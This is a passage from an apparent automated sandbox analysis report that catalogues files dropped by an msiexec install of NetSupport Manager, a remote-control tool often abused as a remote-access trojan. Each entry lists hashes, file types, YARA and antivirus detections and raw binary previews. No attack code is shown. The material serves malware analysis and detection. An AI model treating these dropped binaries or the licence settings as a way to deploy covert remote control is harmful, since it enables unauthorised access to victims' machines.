                                                                                                                    Preview:GIF89al.U.....P.....O..S..............X..T...._.................V................................Q..U...........N..........V..M..P.~............W............W..R.......>p.........Y.......]..`..............|....Br.c.....=o.X...........g.....}....m.....Hu.S}....Cs....R|..R....@q....y...O.\..k..;n.r..x..z..Ft.Z...Q.Ny.h...X....a.....t...N.o..i..Oz..U....V~.e........8l.p..u.....Et.d...Y..K....l......L.9m.Kw..R.......Lx.Q{.U}..S.....T.q..4k.v..2j..Y....._.....J.1i........[..I./h....Iv.....J.&d.$d.....\..H.6l..]..a..L..^..H..I..b.-g..]..Z..G.......)e..G.....D.......+f..F..E..B."c..F..E.....K..B..C..F..D..C..`......................................................................................................................!.......,....l.U........H.`6..JY...L.."...VP`...Dd.p...l =V.I...(?RDh..<.......A.fE......Ej..4d.H...Y.U.VD..!.H.*..`..FM..\j..$..Ch.${$T..pO........hpI.%K..I...KcG.......B.....<..)@..?r.Lg+T..X.....@.@....^..

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\keyboard2.gif

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 256 x 256
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4283
                                                                                                                    Entropy (8bit):7.821192064882651
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:WpJqWEsMxTm3h0CXoxYCPLMh3ACSf8IMCldhzGs:WpJyT8mAsdzG3Apf1MCvV
                                                                                                                    MD5:EC30AA4154A544FC9426051D0B91F90B
                                                                                                                    SHA1:0CCE9BBBCC46D51040B2102561FF9E59FC8390E9
                                                                                                                    SHA-256:1D2C086DBB986B6D7246864EBD9F8D265E7ABA98F79AE6E52A53C86F46EFC85F
                                                                                                                    SHA-512:4170304640A652F55C58787C4AAF0A18D6EC7C782A419EF0C0A11F2958FE950B3707D454FF92E0AEF85E7E279DAB5319E26285BA5D8D372FA400C83C7691398F
                                                                                                                    Malicious:false
                                                                                                                    Preview:GIF89a..........xyz888"..................................................#..#..$..%..'..(..*..*..,..-..-.....0..2..4..4..5..6..7..8..9..:..=..=..>..>..?..@..@..D..D..E..G..H..H..J..L..M..L..L..O..O..P..Q..S..T..U..V..X..Z..[..].._.._..b..b..d..f..f..g..h..j..i..i..m..n..o..q..p..s..t..v..w..w..z..|..~...............................................................................................................1..2..4..6..<..B..F..K..M..U..c..b..h..h..k..o..r..q..u..t..~.....................................................................................................................................................................................................................................................................!.......,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s...3%.].p..I...]bxX.0...-..J.*s...X....kJ\@.:5... .......p.^.........P...l)..K.pAeg2.c.qa=!.ZqLY..vU(...l1Lv-..L.......^-...,.

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\network2.gif

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 256 x 256
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2951
                                                                                                                    Entropy (8bit):7.881907377142764
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:j6pdPL2M8R95nbi6j7BCqR7eUP0Pg9DDe1EgOl6UXU7M1SIFI11sSaA4Ve:judT2Rs6j7hyUPNeK56UrjA40
                                                                                                                    MD5:DD3B10ADD893198C9159F2A4D0E7C534
                                                                                                                    SHA1:A3E1B3092E8BD0C89BF237D15104A2348C7AAC3C
                                                                                                                    SHA-256:588B76D2B41138AB4BC6EA53F6D7742A771488346F2AF1A854836524816F1126
                                                                                                                    SHA-512:B610D3290982FC6ADEF21A4053DA7C09EFAB2337BB8B68856DB58293AD509BCE89B93CFD2229CE9BCD6FFC0D4B14B0FCFBF9AD989583A2CC4AE02558D1250E3F
                                                                                                                    Malicious:false
                                                                                                                    Preview:GIF89a.......q.6p.7.......0888......!.......,...........h...0.I..8...`(.di.h..l.p,.tm.x..|....pH,...r.l:..tJ.Z..v..z..xL....z.n...|N.....~...........................g........................................................................................................8P.5O..*\..C..>9.H..E..+H......2R......EN .....TJ`.....dF....O.:!..I..CO..*].0.L.J.....X......X.2....R...]........K...x...k...~........s..E...<....cL.2e.-...@.f..:..`.y.S..0..uY.;:d.....}X6o.......r...V.\8l..3.;...'......5V...|b....W..|..P./.=u...=KoG.......(......a....w....{r5.Y_...&.=(..j.aa.J........%6.`..$....h"...X.. .. ...(.........(......6...:..%.AZ8d|/>..9...I..b.`.H....X..\r)%..1......;..f&j.Wf.2..]j...:yf.-^.I........8g...H).a.)...d...n..)...)g.........*?..J.F.*.J..*...i.......k.....z....V....&.k...i..*j..TR........B;..V.....i....."+..r.o..Z...B.....m.......".....p..R....OI.. +i...b..."/.\......#....,.........N...Kr.:k\r.2..}4.d.;."...

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\printer2.gif

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 256 x 256
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2035
                                                                                                                    Entropy (8bit):7.88230344011226
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:FSo5FF/7f5vb7vgIsYIeUqVnV5sJDZaQnn9t5o7q8qr/W:8o5FNflb7gIPUqz5sJLn9t5V8qzW
                                                                                                                    MD5:9B1957B4A51144937F248740C26D24B8
                                                                                                                    SHA1:B06D1590071110A36E6A94B516E46818F73A797D
                                                                                                                    SHA-256:E2B717CA84391B8D2158E8029F1C24920180CC9FFB88616520B0E05CE521E528
                                                                                                                    SHA-512:A048AE98A57870AB67FC954F4E49DBA2534573DB3362BF2C28006FBA40B92526769DFC086BBBD1427BBAF1EB4629D19B5ECA2D87A088E8BCEE19DC8E1931B600
                                                                                                                    Malicious:false
                                                                                                                    Preview:GIF89a.............xyy888.d..c.......!.......,...........x...0.I..8...`(.di.h..l.p,.tm.x..|....pH,..H.`.l:..tJ.Z..l4y.z..x.....z}5...\......>...p|2...a.1...U.0Q................[............,.........*........(......&......$....P.)......!................................]...`...+.4.....6...b....V....c..96..._H..H..w....+.D.3f.."k.......zZ....P.D.6;.0.Rr.\jp...S.T..../..]\.y.J+l..d.E...mZXf.}.*.tO..7o............9.F.8...)4v.i1..-Y..9.C.%t.,is........jG.=.F.;.lA.).....:...v.|.p3....<..$..>G....#..^7....".~'.^..!...... ........................4....t.....`..~. ..f4a.P...hB... .(.$.h.(...,...0.X".2.h.8..<.Hc.@.).D.I..F&..L..d.PF).(>I.Xf...Zv..8Z..d........l...p.).t.i.x..|.I"...)..j.".'.#&..F*.Z@.f..VZ....*...).....bz....*.........yk...*...A..&.,..#....Bj...Fk.xN.@..v..6...v...............i....k......,(...Z#..'.'.........,."f{p....p.._...mn...2"...".Hr.&..q.....$..2.0..1...h.......#..3./Oli.~2...H...N.Ym.

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\redbar.gif

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 1 x 20
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):831
                                                                                                                    Entropy (8bit):0.9654320700764645
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:CBI/nExibw5laBr02mxhl/E0ltrllUklE:waERi0Rl/1lGklE
                                                                                                                    MD5:67B2128FB5228203D3CA1E746BF9C15D
                                                                                                                    SHA1:084C644983B44ABE7527E6B38390C0000C3F11CC
                                                                                                                    SHA-256:BE1B29D4F7699CD988FA1E6AB5255735BC4A53C02CD64ACF1BE345EE4EA5F800
                                                                                                                    SHA-512:137271AF0E21605E5F59F0786F0B22456EB660B2D8425364B2F036693546D56941CDF958B50DEAB04798C36AA27FBBF41ECBC6828CD5A796AF0605F23C457F4B
                                                                                                                    Malicious:false
                                                                                                                    Preview:GIF89a........>6.>6.>>.G>.G>.G>.G>.G>........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,...............H.`...;

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\unknown.gif

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 16 x 16
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):952
                                                                                                                    Entropy (8bit):3.3227002761893862
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:PacUfx/L7/elDHgVHhV9In1gFyEDZjJO73T9+K2ki:vw2lD8HX9In6y+Pa3R+97
                                                                                                                    MD5:0D0A3F569BE68B6046C02F739DDDAD52
                                                                                                                    SHA1:9C7A14C4DD671B4BDFC9EEFFE8478EF1A3E0C3BA
                                                                                                                    SHA-256:F4929A6F524DC3BD502C263C08E4F3DF238BE21512759E7C85B3C31A44C49CA8
                                                                                                                    SHA-512:CF45F36444BBE731674B19B5090008C3AAE968037CB516989455C1576FBA54AF5CCCED42CB28251383401CD55822A42EBF8A8A71DE3E6B9B8576501AA4A37286
                                                                                                                    Malicious:true
                                                                                                                    Preview:GIF89a........m.0n.2p.4q.7s.8s.>x.@z.E}.H..L..Q..T..V..Z..^.._..b..f..m..r..y..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,...............xa....2.\........P.0B..&........HX|.A`...b.0aB...q|."F.."b|....D...<....O....e.."...k....gD. .B......;...Q@..^.vu....".P.....d..e......80...;

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\verified.gif

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 32 x 32
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):958
                                                                                                                    Entropy (8bit):3.837476529387128
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:3/ZIjXg3LZKOU5pImNVVN6UxKF8uT00NLkE:32jgMx5Kmrr6Ux1izL/
                                                                                                                    MD5:715C4A7A4ECB3C17856F3486067583B3
                                                                                                                    SHA1:860F26ED5F34D290EECFF0CFA7AD8DD8A0FE8318
                                                                                                                    SHA-256:E0DED6BD0DFA994E59786BC83CB62493F511B07F93CDE4305E88A3B1A8986862
                                                                                                                    SHA-512:ECD7A73F48F36F1F273DCF07DD1B294C43DAE974BD5BCFED60C8761CC1802176E3D4C00395454C824262E580E343C12C9866EBE4E0ED4DA6DF264B3817FBEC47
                                                                                                                    Malicious:false
                                                                                                                    Preview:GIF89a . .......................{.z.y.x.(.[(.\'.[..S..S".W'.[(.[).\).\w.y....................!.......,.... . ...q`'.di.h..l.p,..l5.4Vn.....h,.D#rT<.;.'......@rae...#.*<..-.e...D..9.....l/..3|$...4..."..H....O...R..R......!.;.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,...............(.....&.\.O.........A........b...*....c....Q.....(-....f..#F@....C...|<.sD..........;..X..A..E.~d`..PY....$..K.>L...K.;A~.00......YS.Y..-,(P......;

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\video2.gif

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 256 x 256
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1163
                                                                                                                    Entropy (8bit):7.788256448215719
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:Gek36A873hchk6lo7Cl1sx6LJXLs9eIavsAD3v3KF8lqeKmX:tkqA8DhUloS3VjIaz3v3oR2
                                                                                                                    MD5:1DE02006ADA71EEEEF52BDE607411092
                                                                                                                    SHA1:26224EAD28E087B0CB5AAD3A5CD584598407BA14
                                                                                                                    SHA-256:241E11F78B196CB96B742E901AC4B07014D9BE89C38FC51C26993E00EFA42464
                                                                                                                    SHA-512:3B37E775D6DE4C615B137D7F7DE75176B7AC9946BCFDF6FDB04D9A8F570D97EF6E564B4990D9390F8FBFFE7677730A0E786EF5CBBBCC2D10749FAF4736F1CACB
                                                                                                                    Malicious:false
                                                                                                                    Preview:GIF89a..........888......!.......,...........................H........L..............L*.....J.....j..........N....................(8..`x..........)9IYiy...H......*:J..Y.......p..+;K..[.....y....l;!\l|.....l. =M]m}...........>N....P.........N..o.....?/...0.....E.G0............>|.......]t....$.}l.....O2H.2.L~........0s...n...@...&4..L.&E...T.O.D...eU.W.z..U@.d5..[6m....}....zp.{...kM.M.7..z.....b....v.8...%[vG.....2....cb..C...9...G.,.:6...d.6..%..i...w...W./.;....-.o..9...K.n.1..s...;..../..<z...m..+..Y..j.~........r<1..|..E`....T.... T.>._.VMH...r.a...5.d....1.h.J(.X.,..b^".(..4rd.w..:.....)d_...Y.@n(V.J.D..E)eAL.UeGTf.......W:.fE[...`........I.....Y.....'.v..'....(.G..f.Z........z..g.F>...x...n:$...).N.\..Z......:T...jkk.".j.i..`..NV..k,M..J(l..!....i..b......Z.m..:;n...{....n.......:...z......Z.o..7:....zp....0....0...91...yq..s.q..W...!?9..%.y..)....-.H.32...:4..,6..s...s.Bc...F..H.H/..L?=..PO.3!.Nk..ae...\..

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\IsMetro.exe

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):58336
                                                                                                                    Entropy (8bit):6.882094538107883
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:0sOCkVP/zMhlawzEDmAnomANKl49r2pe/TeHDHf/ckpvr2pe/DkqHDHf/cklON:0htcW+KlUee/SjHdjee/hjHhK
                                                                                                                    MD5:E06343CDA474C451258894E1AF0EA7B0
                                                                                                                    SHA1:9A02F031A278A3245272ECE1004D0BDD1F40F58D
                                                                                                                    SHA-256:83222B71D197592C717835F9DAEE81266BE6F47B67B0ED5C84CAEF25877E876B
                                                                                                                    SHA-512:824185904B08A17D8D2F139376F8BD0C622EF9D461881E117809CB14E043BD77E4A730A6C0E8F1A791DFF355214EB7B5D6F89B19E3271017547A63D7BCC9F731
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z....y...y...y..m...y..m...y..c...y...x...y..m...y..m...y..m...y.Rich..y.........................PE..L...H.oe.................F...<...............`....@.................................`g....@..................................y..P........................]...........................................x..@............`...............................text....D.......F.................. ..`.rdata.......`... ...J..............@..@.data................j..............@....rsrc................v..............@..@.reloc...............~..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClient32UI.exe

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2419680
                                                                                                                    Entropy (8bit):4.698078733564096
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:OlRqzaIVAjheUC4PHYsDyl5+xAx8rSI/HhkSkJ2v7rz82ahdMbAK+p8q6JfXHWZO:4c1xUh85oY05Hhlmj9aZ
                                                                                                                    MD5:15ACD82C7402BC89F61F2A5E2B0C90EB
                                                                                                                    SHA1:068D37149E372F01EFEBC40B42BFD873AB9BCFF2
                                                                                                                    SHA-256:2B9673D6AB08AC2204D50A327D838047A6C64ACDAD765B887B3349D70C9CD307
                                                                                                                    SHA-512:287A0C23C97E1D557268160F40B6CAC533BFCF7515362C608D57D3DB797AF3499DC0276E775661005A2C8A64462579F8510DE9073FD245CC569516D6F15D0CB4
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClient32UI.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..F..F..F.H...F......F....}.F.....F.....F.....F.....F......F..G..F......F.....F.....F.Rich.F.........PE..L...N.oe..........................................@...........................%.......%...@.............................................l.............$..]...`$.h^..P...............................p...@............................................text............................... ..`.rdata..............................@..@.data........ ...D..................@....rsrc...l............F..............@..@.reloc......`$.......#.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exe

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):232416
                                                                                                                    Entropy (8bit):6.6458885862654755
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:l60wP+d9JCHANFegxoTRy212Te/giriLeIezEB:l6dE9MH8FegGTU20T8zxzQ
                                                                                                                    MD5:9B60C6DDFD1C4BC22007578132FDEE99
                                                                                                                    SHA1:462DE03AC21EBBAAB8C9A325C7DA8F82B50C6B0B
                                                                                                                    SHA-256:5ECC47AFFF0FC16009B369A9B5BB969F5DD36D47207BF2A6CF433903E74C216B
                                                                                                                    SHA-512:F106918649B42EEDB4262C0699FAF465296331990691C99BC16990BC66AB2E3FB6CEEB3FAAF978DE4A4329954BF37D9AB79CC368A08CD38035F4750CBF169217
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..<..to..to..to...o..toi..o..toi..o..toi..o7.to...o..to...o..to..uo..to...o..toi..o..toi..o..toRich..to........................PE..L.....oe.................Z..................p....@.......................................@.................................|........0...................]...@...%..pt..............................8...@............p...............................text...JY.......Z.................. ..`.rdata...g...p...h...^..............@..@.data....F..........................@....rsrc........0......................@..@.reloc...K...@...L..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\NSM.LIC

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):253
                                                                                                                    Entropy (8bit):5.069358624511852
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:Iyovk4xRPjwxVza1DKHMoEEjLgpW2MQDHZYpPM/io6K6a8l6i7s:IFR7wx9vJjjqW2M5PM/iovH8l6J
                                                                                                                    MD5:D2C2217861F5535686409D80A0867F6F
                                                                                                                    SHA1:F4D90BEBFCF8F501E5B9F0427028F696C3A191C7
                                                                                                                    SHA-256:AF9C79CF3AF6A7E969208DA78DFCFAC54D6F956545B46F434D0E447CFF94807B
                                                                                                                    SHA-512:656DEAC03F9D81792E3D78108FB7D6754CA4A21A30F0E8DA72E71F64B0B015DFC299D5478A8CC27ACB05A0EC7E01C2C1CFCC9EB40041E4FE0A790414E42B4A37
                                                                                                                    Malicious:false
                                                                                                                    Preview:1400..0x98f177db....; NetSupport License File...; Generated on 02:59 - 15/09/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=NSM1234..maxslaves=9999..os2=1..product=10..serial_no=NSM1234..shrink_wrap=0..transport=0..

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\NSM.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Generic INItialization configuration [Features]
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6458
                                                                                                                    Entropy (8bit):4.645519507940197
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                                                                    MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                                                                    SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                                                                    SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                                                                    SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                                                                    Malicious:false
                                                                                                                    Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\NSToast.exe

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):115168
                                                                                                                    Entropy (8bit):6.225008841780487
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:/oKKGZiiHapQXaPjALcunPsWjcdRCunjVpnAK9LXee/VujHNee/RjH0:wKKQ/KP8+RCuntxe2ujtesjU
                                                                                                                    MD5:27C16711A2025C061EA30E09F1BF6609
                                                                                                                    SHA1:308BF98A3E597B83D066B8F149E47C12FC487642
                                                                                                                    SHA-256:9159A0FFA498F379570478EC09479764FB8B7130E73B3C02F2FE7BD709B9B20C
                                                                                                                    SHA-512:9152A43977F82EAC69BD953F9B8D2FEB64C7102386736C8847A32A40D9DF82DCB6DBEA3FDE3D44835C6D03628124308CC240A9EB8456CBC44E6760F40A265D10
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSToast.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=.fS..fS..fS.v....fS.v....fS.v....fS.{..fS.{..fS.{..fS..fR..fS......fS......fS....fS..f..fS....fS.Rich.fS.........PE..L...;.oe.............................,............@.................................!.....@..........................................P..H............d...]...p..(......8...........................0...@............................................text... ........................... ..`.rdata..8_.......`..................@..@.data...4:..........................@....rsrc...H....P......................@..@.reloc..*3...p...4...0..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICHEK.DLL

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):32224
                                                                                                                    Entropy (8bit):7.0841664339711
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:o52mnrr2pe/GJvHDHf/ckIYBpr2pe/G+HDHf/ckC:gPnfee/wjHx1ee/7jHW
                                                                                                                    MD5:907C8647640B41EB840DD3F8D5C0267E
                                                                                                                    SHA1:87D374852CEEB5AB41E6D39FD3B407E51B2BE6F7
                                                                                                                    SHA-256:4EE7811DFDF1ED46BD2D224B81B3FB0F5371FD5A4DB18358F052DA73316D9A99
                                                                                                                    SHA-512:B7F6CA82C5547CBA9259934DF8AE08BA706E4FB3E8DB10E1EEB44EDF00336C60BC7CD732BE113E11A321A657D30FC9F1B396A28B2342FD96682EA68147D303D6
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICHEK.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%..a..a..a....y.e....}.`....{.`....O.d....N.c..h.v.h..a.......K.l....~.`......`....x.`..Richa..........PE..L.....oe...........!......................... ...............................`............@.........................p#..r....!..P....@............... ...]...P......P ............................... ..@............ ..D............................text...*........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICL32.DLL

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):9087968
                                                                                                                    Entropy (8bit):5.4923586433480756
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:49152:aZcDBXpzw67GUIZr7h4721VgP6la/o7TdT7ZbMa3kTaSh95Qn1RURG:KWIM7q2SAyqTaShAnAI
                                                                                                                    MD5:4BFB9DB4940644EAD940B6C3DB7B6C12
                                                                                                                    SHA1:48DC699DD2ABDD6562BB14B332C031439717A666
                                                                                                                    SHA-256:ACA860C6121287876582D3FACA1D120B0B92DA220A537220AC4A352828DAEFB3
                                                                                                                    SHA-512:B9B57B719EFD5E8F47837FA18B4D4C8E952D962281A09F16B4CE494AB38B851DAC305402C1873FCE41B602B79FE17473EF785D5635B3E5967DBD3D7480CA1357
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICL32.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........]..]..].....Y..2...W..2...Y..2.6.v..T...R..T...\..T...j..]..U..2.2....2.3.z..2...\..2...\..2...\..Rich]..................PE..L...;8_f...........!.....F....k..............`...............................@............@...........................&.....(m&.0.....(.P._..........N...]... ...F...v........................$......$.@............`......D]&......................text....D.......F.................. ..`.rdata...o...`...p...J..............@..@.data.........&.......&.............@....tls.........`(.......'.............@....hhshare.....p(.......'.............@....rsrc...P._...(..._...'.............@..@.reloc....... ... ..................@..B........................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIHOOKS.DLL

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):164832
                                                                                                                    Entropy (8bit):6.897162199883277
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:AMAlhDScGgKqqrccIPaldpZOWCFheHzS7whb1cVeEj5eijd:cfDiWqO9o9Keeei
                                                                                                                    MD5:9324FCA454B0112B4DD12450FD3DAD1C
                                                                                                                    SHA1:8AE28F336B602FCB3ED8E83272DD27D622C50A65
                                                                                                                    SHA-256:3C1FA4D5AFC3996517990D3C36CBBD5BE1939007123F5CA288B3B64CEBC1FC7D
                                                                                                                    SHA-512:03DA719A40D656130B2D849A3AE689B035C2CA75EB8BADC4EDAF27CC7548DDDB3E923D530ECA28E0B8E94A8984B4F977829339573490489BA670DEC36D11F966
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIHOOKS.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F....d..d..d.m.y..d...d..d...t..d..d.d.m.M.Dd.m.L.!d.m.|..d.m.}..d.m.z..d.Rich.d.........PE..L...x.oe...........!.................s............ ..........................p............@..........................................@..4............&...]...P..........................................@...............`............................text............................... ..`.rdata...b.......d..................@..@.data...H!..........................@....rsrc...4....@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIIMAGE.DLL

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):632288
                                                                                                                    Entropy (8bit):6.835333969996357
                                                                                                                    Encrypted:false
